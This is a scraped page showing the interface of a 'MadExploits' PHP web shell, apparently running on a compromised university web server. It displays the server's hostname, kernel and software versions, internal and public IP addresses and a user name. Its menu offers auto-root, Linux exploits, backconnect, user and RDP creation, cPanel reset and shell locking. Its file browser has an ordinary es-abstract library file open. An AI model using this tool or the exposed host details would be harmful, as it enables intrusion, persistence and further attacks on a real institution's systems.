Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.147.193.205
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
node_modules /
es-abstract /
[ HOME SHELL ]
Name
Size
Permission
Action
helpers
[ DIR ]
drwxr-xr-x
operations
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.editorconfig
276
B
-rw-r--r--
.jscs.json
3.91
KB
-rw-r--r--
.nycrc
234
B
-rw-r--r--
.travis.yml
6.8
KB
-rw-r--r--
GetIntrinsic.js
8.38
KB
-rw-r--r--
Makefile
3.75
KB
-rw-r--r--
es2015.js
21.28
KB
-rw-r--r--
es2016.js
454
B
-rw-r--r--
es2017.js
633
B
-rw-r--r--
es5.js
6.33
KB
-rw-r--r--
es6.js
53
B
-rw-r--r--
es7.js
53
B
-rw-r--r--
index.js
427
B
-rw-r--r--
package.json
2.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : es2017.js
'use strict'; var ES2016 = require('./es2016'); var assign = require('./helpers/assign'); var ES2017 = assign(assign({}, ES2016), { ToIndex: function ToIndex(value) { if (typeof value === 'undefined') { return 0; } var integerIndex = this.ToInteger(value); if (integerIndex < 0) { throw new RangeError('index must be >= 0'); } var index = this.ToLength(integerIndex); if (!this.SameValueZero(integerIndex, index)) { throw new RangeError('index must be >= 0 and < 2 ** 53 - 1'); } return index; } }); delete ES2017.EnumerableOwnNames; // replaced with EnumerableOwnProperties module.exports = ES2017;
Close